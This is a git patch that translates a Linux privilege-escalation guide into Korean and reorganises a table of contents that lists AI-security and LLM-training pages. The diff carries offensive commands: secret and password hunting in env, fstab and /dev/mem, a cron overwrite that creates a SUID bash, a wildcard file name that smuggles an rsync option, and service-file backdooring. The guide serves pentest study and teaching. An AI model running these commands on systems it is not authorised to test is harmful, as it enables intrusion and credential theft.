From 9d2e0c9648e518764493aca5698442fa261ae0b5 Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 7 Jun 2025 16:45:12 +0000 Subject: [PATCH] Translated ['src/linux-hardening/privilege-escalation/README.md'] to ko --- src/SUMMARY.md | 34 +- .../privilege-escalation/README.md | 172 ++-- .../0.-basic-llm-concepts.md | 285 ----- .../1.-tokenizing.md | 95 -- .../2.-data-sampling.md | 240 ----- .../3.-token-embeddings.md | 203 ---- .../4.-attention-mechanisms.md | 416 -------- .../5.-llm-architecture.md | 666 ------------ .../6.-pre-training-and-loading-models.md | 970 ------------------ .../7.0.-lora-improvements-in-fine-tuning.md | 61 -- .../7.1.-fine-tuning-for-classification.md | 117 --- ...7.2.-fine-tuning-to-follow-instructions.md | 100 -- .../llm-training-data-preparation/README.md | 98 -- 13 files changed, 109 insertions(+), 3348 deletions(-) delete mode 100644 src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md delete mode 100644 src/todo/llm-training-data-preparation/1.-tokenizing.md delete mode 100644 src/todo/llm-training-data-preparation/2.-data-sampling.md delete mode 100644 src/todo/llm-training-data-preparation/3.-token-embeddings.md delete mode 100644 src/todo/llm-training-data-preparation/4.-attention-mechanisms.md delete mode 100644 src/todo/llm-training-data-preparation/5.-llm-architecture.md delete mode 100644 src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md delete mode 100644 src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md delete mode 100644 src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md delete mode 100644 src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md delete mode 100644 src/todo/llm-training-data-preparation/README.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 4e7b0adb5..0bfdeb3af 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -793,6 +793,29 @@ - [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) - [iOS Exploiting](binary-exploitation/ios-exploiting.md) +# ๐Ÿค– AI +- [AI Security](AI/README.md) + - [AI Security Methodology](AI/AI-Deep-Learning.md) + - [AI MCP Security](AI/AI-MCP-Servers.md) + - [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md) + - [AI Models RCE](AI/AI-Models-RCE.md) + - [AI Prompts](AI/AI-Prompts.md) + - [AI Risk Frameworks](AI/AI-Risk-Frameworks.md) + - [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md) + - [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md) + - [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md) + - [LLM Training](AI/AI-llm-architecture/README.md) + - [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md) + - [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md) + - [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md) + - [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md) + - [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md) + - [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md) + - [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md) + - [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md) + - [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md) + - [7.2. 
Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md) + # ๐Ÿ”ฉ Reversing - [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md) @@ -850,17 +873,6 @@ - [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md) - [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md) - [Test LLMs](todo/test-llms.md) -- [LLM Training](todo/llm-training-data-preparation/README.md) - - [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md) - - [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md) - - [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md) - - [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md) - - [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md) - - [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md) - - [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md) - - [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md) - - [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md) - - [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md) - [Burp Suite](todo/burp-suite.md) - [Other Web Tricks](todo/other-web-tricks.md) - [Interesting HTTP$$external:todo/interesting-http.md$$]() diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 4f5247413..b698386bb 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -6,7 +6,7 @@ ### OS info -์šด์˜ ์ค‘์ธ OS์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์–ป๋Š” ๊ฒƒ๋ถ€ํ„ฐ ์‹œ์ž‘ํ•ฉ์‹œ๋‹ค. +์šด์˜ ์ค‘์ธ OS์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์–ป๊ธฐ ์‹œ์ž‘ํ•ฉ์‹œ๋‹ค. ```bash (cat /proc/version || uname -a ) 2>/dev/null lsb_release -a 2>/dev/null # old, not by default on many systems @@ -20,7 +20,7 @@ echo $PATH ``` ### Env info -ํฅ๋ฏธ๋กœ์šด ์ •๋ณด, ๋น„๋ฐ€๋ฒˆํ˜ธ ๋˜๋Š” API ํ‚ค๊ฐ€ ํ™˜๊ฒฝ ๋ณ€์ˆ˜์— ์žˆ์Šต๋‹ˆ๊นŒ? +ํ™˜๊ฒฝ ๋ณ€์ˆ˜์— ํฅ๋ฏธ๋กœ์šด ์ •๋ณด, ๋น„๋ฐ€๋ฒˆํ˜ธ ๋˜๋Š” API ํ‚ค๊ฐ€ ์žˆ์Šต๋‹ˆ๊นŒ? 
```bash (env || set) 2>/dev/null ``` @@ -39,13 +39,13 @@ searchsploit "Linux Kernel" ```bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' ``` -์ปค๋„ ์ทจ์•ฝ์ ์„ ๊ฒ€์ƒ‰ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋  ์ˆ˜ ์žˆ๋Š” ๋„๊ตฌ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: +์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์„ ๊ฒ€์ƒ‰ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋  ์ˆ˜ ์žˆ๋Š” ๋„๊ตฌ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\ [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\ -[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (ํ”ผํ•ด์ž์—์„œ ์‹คํ–‰, ์ปค๋„ 2.x์— ๋Œ€ํ•œ ์ทจ์•ฝ์ ๋งŒ ํ™•์ธ) +[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (ํ”ผํ•ด์ž์—์„œ ์‹คํ–‰, 2.x ์ปค๋„์— ๋Œ€ํ•œ ์ต์Šคํ”Œ๋กœ์ž‡๋งŒ ํ™•์ธ) -ํ•ญ์ƒ **Google์—์„œ ์ปค๋„ ๋ฒ„์ „์„ ๊ฒ€์ƒ‰ํ•˜์„ธ์š”**, ์•„๋งˆ๋„ ๊ท€ํ•˜์˜ ์ปค๋„ ๋ฒ„์ „์ด ์–ด๋–ค ์ปค๋„ ์ทจ์•ฝ์ ์— ๊ธฐ๋ก๋˜์–ด ์žˆ์„ ๊ฒƒ์ด๋ฉฐ, ๊ทธ๋Ÿฌ๋ฉด ์ด ์ทจ์•ฝ์ ์ด ์œ ํšจํ•˜๋‹ค๋Š” ๊ฒƒ์„ ํ™•์‹ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +ํ•ญ์ƒ **Google์—์„œ ์ปค๋„ ๋ฒ„์ „์„ ๊ฒ€์ƒ‰ํ•˜์„ธ์š”**, ์•„๋งˆ๋„ ๊ท€ํ•˜์˜ ์ปค๋„ ๋ฒ„์ „์ด ์ผ๋ถ€ ์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์— ๊ธฐ๋ก๋˜์–ด ์žˆ์„ ๊ฒƒ์ด๋ฉฐ, ๊ทธ๋Ÿฌ๋ฉด ์ด ์ต์Šคํ”Œ๋กœ์ž‡์ด ์œ ํšจํ•˜๋‹ค๋Š” ๊ฒƒ์„ ํ™•์‹ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ### CVE-2016-5195 (DirtyCow) @@ -59,7 +59,7 @@ https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` ### Sudo ๋ฒ„์ „ -์ทจ์•ฝํ•œ sudo ๋ฒ„์ „์— ๋”ฐ๋ผ ๋‹ค์Œ์— ๋‚˜ํƒ€๋‚ฉ๋‹ˆ๋‹ค: +์ทจ์•ฝํ•œ sudo ๋ฒ„์ „์— ๋”ฐ๋ผ ๋‹ค์Œ์— ๋‚˜ํƒ€๋‚˜๋Š”: ```bash searchsploit sudo ``` @@ -131,7 +131,7 @@ docker-security/ ## Drives -**๋ฌด์—‡์ด ๋งˆ์šดํŠธ๋˜๊ณ  ์–ธ๋งˆ์šดํŠธ๋˜์—ˆ๋Š”์ง€**, ์–ด๋””์„œ ์™œ ๊ทธ๋Ÿฐ์ง€ ํ™•์ธํ•˜์„ธ์š”. ์–ธ๋งˆ์šดํŠธ๋œ ๊ฒƒ์ด ์žˆ๋‹ค๋ฉด ๋งˆ์šดํŠธํ•ด๋ณด๊ณ  ๊ฐœ์ธ ์ •๋ณด๋ฅผ ํ™•์ธํ•ด๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +**๋งˆ์šดํŠธ๋œ ๊ฒƒ๊ณผ ๋งˆ์šดํŠธ ํ•ด์ œ๋œ ๊ฒƒ**์„ ํ™•์ธํ•˜๊ณ , ์–ด๋””์„œ ์™œ ๊ทธ๋Ÿฐ์ง€ ํ™•์ธํ•˜์„ธ์š”. ๋งˆ์šดํŠธ ํ•ด์ œ๋œ ๊ฒƒ์ด ์žˆ๋‹ค๋ฉด, ๊ทธ๊ฒƒ์„ ๋งˆ์šดํŠธํ•˜๊ณ  ๊ฐœ์ธ ์ •๋ณด๋ฅผ ํ™•์ธํ•ด ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ```bash ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null @@ -144,7 +144,7 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc ```bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` -๋˜ํ•œ **์–ด๋–ค ์ปดํŒŒ์ผ๋Ÿฌ๊ฐ€ ์„ค์น˜๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค**. ์ด๋Š” ์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์‚ฌ์šฉํ•ด์•ผ ํ•  ๊ฒฝ์šฐ ์œ ์šฉํ•˜๋ฉฐ, ์ด๋ฅผ ์‚ฌ์šฉํ•  ๋จธ์‹ (๋˜๋Š” ์œ ์‚ฌํ•œ ๋จธ์‹ )์—์„œ ์ปดํŒŒ์ผํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. +๋˜ํ•œ **์–ด๋–ค ์ปดํŒŒ์ผ๋Ÿฌ๊ฐ€ ์„ค์น˜๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์„ธ์š”**. ์ด๋Š” ์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์‚ฌ์šฉํ•ด์•ผ ํ•  ๊ฒฝ์šฐ ์œ ์šฉํ•˜๋ฉฐ, ์ด๋ฅผ ์‚ฌ์šฉํ•  ๋จธ์‹ (๋˜๋Š” ์œ ์‚ฌํ•œ ๋จธ์‹ )์—์„œ ์ปดํŒŒ์ผํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. 
```bash (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") ``` @@ -158,11 +158,11 @@ rpm -qa #Centos ``` SSH์— ๋Œ€ํ•œ ์ ‘๊ทผ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, **openVAS**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋จธ์‹ ์— ์„ค์น˜๋œ ๊ตฌ์‹ ๋ฐ ์ทจ์•ฝํ•œ ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -> [!NOTE] > _์ด ๋ช…๋ น์€ ๋Œ€๋ถ€๋ถ„ ์“ธ๋ชจ์—†๋Š” ๋งŽ์€ ์ •๋ณด๋ฅผ ํ‘œ์‹œํ•˜๋ฏ€๋กœ, ์„ค์น˜๋œ ์†Œํ”„ํŠธ์›จ์–ด ๋ฒ„์ „์ด ์•Œ๋ ค์ง„ ์ทจ์•ฝ์ ์— ์ทจ์•ฝํ•œ์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” OpenVAS์™€ ๊ฐ™์€ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค._ +> [!NOTE] > _์ด ๋ช…๋ น์€ ๋Œ€๋ถ€๋ถ„ ์“ธ๋ชจ์—†๋Š” ๋งŽ์€ ์ •๋ณด๋ฅผ ํ‘œ์‹œํ•˜๋ฏ€๋กœ, ์„ค์น˜๋œ ์†Œํ”„ํŠธ์›จ์–ด ๋ฒ„์ „์ด ์•Œ๋ ค์ง„ ์ทจ์•ฝ์ ์— ์ทจ์•ฝํ•œ์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” OpenVAS์™€ ๊ฐ™์€ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค._ -## Processes +## ํ”„๋กœ์„ธ์Šค -**์–ด๋–ค ํ”„๋กœ์„ธ์Šค**๊ฐ€ ์‹คํ–‰๋˜๊ณ  ์žˆ๋Š”์ง€ ์‚ดํŽด๋ณด๊ณ , ์–ด๋–ค ํ”„๋กœ์„ธ์Šค๊ฐ€ **ํ•„์š” ์ด์ƒ์œผ๋กœ ๊ถŒํ•œ์ด ์žˆ๋Š”์ง€** ํ™•์ธํ•˜์‹ญ์‹œ์˜ค (์˜ˆ: root๋กœ ์‹คํ–‰๋˜๋Š” tomcat?). +**์–ด๋–ค ํ”„๋กœ์„ธ์Šค**๊ฐ€ ์‹คํ–‰๋˜๊ณ  ์žˆ๋Š”์ง€ ์‚ดํŽด๋ณด๊ณ , ์–ด๋–ค ํ”„๋กœ์„ธ์Šค๊ฐ€ **ํ•„์š” ์ด์ƒ์œผ๋กœ ๊ถŒํ•œ์ด ์žˆ๋Š”์ง€** ํ™•์ธํ•˜์‹ญ์‹œ์˜ค(์˜ˆ: root๋กœ ์‹คํ–‰๋˜๋Š” tomcat?). ```bash ps aux ps -ef @@ -182,11 +182,11 @@ top -n 1 ๊ทธ๋Ÿฌ๋‚˜ **์ผ๋ฐ˜ ์‚ฌ์šฉ์ž๋กœ์„œ ์ž์‹ ์ด ์†Œ์œ ํ•œ ํ”„๋กœ์„ธ์Šค์˜ ๋ฉ”๋ชจ๋ฆฌ๋ฅผ ์ฝ์„ ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ๊ธฐ์–ตํ•˜์„ธ์š”**. > [!WARNING] -> ํ˜„์žฌ ๋Œ€๋ถ€๋ถ„์˜ ๋จธ์‹ ์€ **๊ธฐ๋ณธ์ ์œผ๋กœ ptrace๋ฅผ ํ—ˆ์šฉํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๊ถŒํ•œ์ด ์—†๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์†Œ์œ ํ•œ ๋‹ค๋ฅธ ํ”„๋กœ์„ธ์Šค๋ฅผ ๋คํ”„ํ•  ์ˆ˜ ์—†์Œ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. +> ํ˜„์žฌ ๋Œ€๋ถ€๋ถ„์˜ ๋จธ์‹ ์€ **๊ธฐ๋ณธ์ ์œผ๋กœ ptrace๋ฅผ ํ—ˆ์šฉํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๊ถŒํ•œ์ด ์—†๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์†Œ์†๋œ ๋‹ค๋ฅธ ํ”„๋กœ์„ธ์Šค๋ฅผ ๋คํ”„ํ•  ์ˆ˜ ์—†์Œ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. > > ํŒŒ์ผ _**/proc/sys/kernel/yama/ptrace_scope**_๋Š” ptrace์˜ ์ ‘๊ทผ์„ฑ์„ ์ œ์–ดํ•ฉ๋‹ˆ๋‹ค: > -> - **kernel.yama.ptrace_scope = 0**: ๋™์ผํ•œ uid๋ฅผ ๊ฐ€์ง„ ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋ฅผ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ptracing์ด ์ž‘๋™ํ•˜๋˜ ๊ณ ์ „์ ์ธ ๋ฐฉ์‹์ž…๋‹ˆ๋‹ค. +> - **kernel.yama.ptrace_scope = 0**: ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋Š” ๊ฐ™์€ uid๋ฅผ ๊ฐ€์ง„ ํ•œ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ptracing์ด ์ž‘๋™ํ•˜๋˜ ๊ณ ์ „์ ์ธ ๋ฐฉ์‹์ž…๋‹ˆ๋‹ค. > - **kernel.yama.ptrace_scope = 1**: ๋ถ€๋ชจ ํ”„๋กœ์„ธ์Šค๋งŒ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. > - **kernel.yama.ptrace_scope = 2**: ์˜ค์ง ๊ด€๋ฆฌ์ž๋งŒ ptrace๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” CAP_SYS_PTRACE ๊ถŒํ•œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. > - **kernel.yama.ptrace_scope = 3**: ์–ด๋–ค ํ”„๋กœ์„ธ์Šค๋„ ptrace๋กœ ์ถ”์ ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค. ์„ค์ • ํ›„์—๋Š” ptracing์„ ๋‹ค์‹œ ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด ์žฌ๋ถ€ํŒ…์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. @@ -237,7 +237,7 @@ strings /dev/mem -n10 | grep -i PASS ``` ### ProcDump for linux -ProcDump๋Š” Windows์˜ Sysinternals ๋„๊ตฌ ๋ชจ์Œ์—์„œ ํด๋ž˜์‹ ProcDump ๋„๊ตฌ๋ฅผ ์žฌ๊ตฌ์„ฑํ•œ Linux ๋ฒ„์ „์ž…๋‹ˆ๋‹ค. [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)์—์„œ ๋‹ค์šด๋กœ๋“œํ•˜์„ธ์š”. +ProcDump๋Š” Windows์˜ Sysinternals ๋„๊ตฌ ๋ชจ์Œ์—์„œ ํด๋ž˜์‹ ProcDump ๋„๊ตฌ๋ฅผ ์žฌ๊ตฌ์„ฑํ•œ Linux ๋ฒ„์ „์ž…๋‹ˆ๋‹ค. [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)์—์„œ ๋‹ค์šด๋กœ๋“œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ``` procdump -p 1714 @@ -274,7 +274,7 @@ Press Ctrl-C to end monitoring without terminating the process. 
### ํ”„๋กœ์„ธ์Šค ๋ฉ”๋ชจ๋ฆฌ์—์„œ์˜ ์ž๊ฒฉ ์ฆ๋ช… -#### ์ˆ˜๋™ ์˜ˆ์‹œ +#### ์ˆ˜๋™ ์˜ˆ์ œ ์ธ์ฆ ํ”„๋กœ์„ธ์Šค๊ฐ€ ์‹คํ–‰ ์ค‘์ธ ๊ฒƒ์„ ๋ฐœ๊ฒฌํ•˜๋ฉด: ```bash @@ -340,9 +340,9 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh ```bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script ``` -**์™€์ผ๋“œ์นด๋“œ๊ฐ€** _**/some/path/\***_ **์™€ ๊ฐ™์€ ๊ฒฝ๋กœ ์•ž์— ์žˆ์œผ๋ฉด ์ทจ์•ฝํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค (์‹ฌ์ง€์–ด** _**./\***_ **๋„ ๊ทธ๋ ‡์Šต๋‹ˆ๋‹ค).** +**๊ฒฝ๋กœ๊ฐ€** _**/some/path/\***_ **์™€ ๊ฐ™์ด ์™€์ผ๋“œ์นด๋“œ ์•ž์— ์˜ค๋Š” ๊ฒฝ์šฐ, ์ทจ์•ฝํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค (์‹ฌ์ง€์–ด** _**./\***_ **๋„ ๊ทธ๋ ‡์Šต๋‹ˆ๋‹ค).** -๋‹ค์Œ ํŽ˜์ด์ง€์—์„œ ๋” ๋งŽ์€ ์™€์ผ๋“œ์นด๋“œ ์•…์šฉ ์š”๋ น์„ ์ฝ์–ด๋ณด์„ธ์š”: +์™€์ผ๋“œ์นด๋“œ ์•…์šฉ ํŠธ๋ฆญ์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ ๋‹ค์Œ ํŽ˜์ด์ง€๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”: {{#ref}} wildcards-spare-tricks.md @@ -360,15 +360,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > ```bash ln -d -s ``` -### Frequent cron jobs +### ์ž์ฃผ ์‹คํ–‰๋˜๋Š” cron ์ž‘์—… -ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜์—ฌ 1๋ถ„, 2๋ถ„ ๋˜๋Š” 5๋ถ„๋งˆ๋‹ค ์‹คํ–‰๋˜๋Š” ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ™œ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +1๋ถ„, 2๋ถ„ ๋˜๋Š” 5๋ถ„๋งˆ๋‹ค ์‹คํ–‰๋˜๋Š” ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฒ€์ƒ‰ํ•˜๊ธฐ ์œ„ํ•ด ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ™œ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -์˜ˆ๋ฅผ ๋“ค์–ด, **1๋ถ„ ๋™์•ˆ 0.1์ดˆ๋งˆ๋‹ค ๋ชจ๋‹ˆํ„ฐ๋ง**ํ•˜๊ณ , **๋œ ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋กœ ์ •๋ ฌ**ํ•œ ๋‹ค์Œ, ๊ฐ€์žฅ ๋งŽ์ด ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋ฅผ ์‚ญ์ œํ•˜๋ ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: +์˜ˆ๋ฅผ ๋“ค์–ด, **1๋ถ„ ๋™์•ˆ 0.1์ดˆ๋งˆ๋‹ค ๋ชจ๋‹ˆํ„ฐ๋ง**ํ•˜๊ณ , **๋œ ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋กœ ์ •๋ ฌ**ํ•œ ํ›„, ๊ฐ€์žฅ ๋งŽ์ด ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋ฅผ ์‚ญ์ œํ•˜๋ ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` -**๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (์ด ๋„๊ตฌ๋Š” ์‹œ์ž‘ํ•˜๋Š” ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ณ  ๋‚˜์—ดํ•ฉ๋‹ˆ๋‹ค). +**๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (์ด๊ฒƒ์€ ์‹œ์ž‘ํ•˜๋Š” ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ณ  ๋‚˜์—ดํ•ฉ๋‹ˆ๋‹ค). ### ๋ณด์ด์ง€ ์•Š๋Š” ํฌ๋ก  ์ž‘์—… @@ -376,38 +376,38 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` -## Services +## ์„œ๋น„์Šค -### Writable _.service_ files +### ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ _.service_ ํŒŒ์ผ -`.service` ํŒŒ์ผ์— ์“ธ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์„ธ์š”. ์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์„œ๋น„์Šค๊ฐ€ **์‹œ์ž‘**, **์žฌ์‹œ์ž‘** ๋˜๋Š” **์ค‘์ง€**๋  ๋•Œ **๋ฐฑ๋„์–ด๋ฅผ ์‹คํ–‰ํ•˜๋„๋ก** **์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (์•„๋งˆ๋„ ๊ธฐ๊ณ„๊ฐ€ ์žฌ๋ถ€ํŒ…๋  ๋•Œ๊นŒ์ง€ ๊ธฐ๋‹ค๋ ค์•ผ ํ•  ๊ฒƒ์ž…๋‹ˆ๋‹ค).\ -์˜ˆ๋ฅผ ๋“ค์–ด, **`ExecStart=/tmp/script.sh`**์™€ ํ•จ๊ป˜ .service ํŒŒ์ผ ์•ˆ์— ๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์„ธ์š”. +`.service` ํŒŒ์ผ์— ์“ธ ์ˆ˜ ์žˆ๋Š”์ง€ 